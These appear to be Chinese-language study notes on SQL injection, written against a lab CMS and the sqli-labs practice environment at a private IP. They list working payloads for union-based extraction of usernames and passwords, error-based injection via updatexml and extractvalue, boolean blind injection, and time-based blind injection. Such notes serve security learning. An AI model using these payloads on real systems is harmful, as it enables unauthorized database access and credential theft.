SQL注入方式
- 联合查询
查询用户在后面加limit *,*
用户1的
http://10.4.7.173/cms/show.php?id=3 and 1=2 union select 1,2,count(*),4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15 from cms_users
用户2的
http://10.4.7.173/cms/show.php?id=3 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15 from cms_users limit 0,1
- 报错注入
记住常用方法
updatexml
updatexml(1,concat(0x5e,(select database()),0x5e),1) --+
extractvalue
extractvalue(1,concat(0x5e,(select database()),0x5e)) --+
账密
-
布尔盲注
查看数据库是多少位的
http://10.4.7.173/sqli-labs/Less-8/?id=2' and length(database())=8--+
查看数据库名字第一个字母 1,1 2,1 3,1 依此类推 比大小猜数 对了就有回显
http://10.4.7.173/sqli-labs/Less-8/?id=2' and ascii(substr(database(),2,1))=101--+
-
延时注入
http://10.4.7.173/sqli-labs/Less-9/?id=2' and if(ascii(substr(database(),3,1))=99,sleep(5),1) --+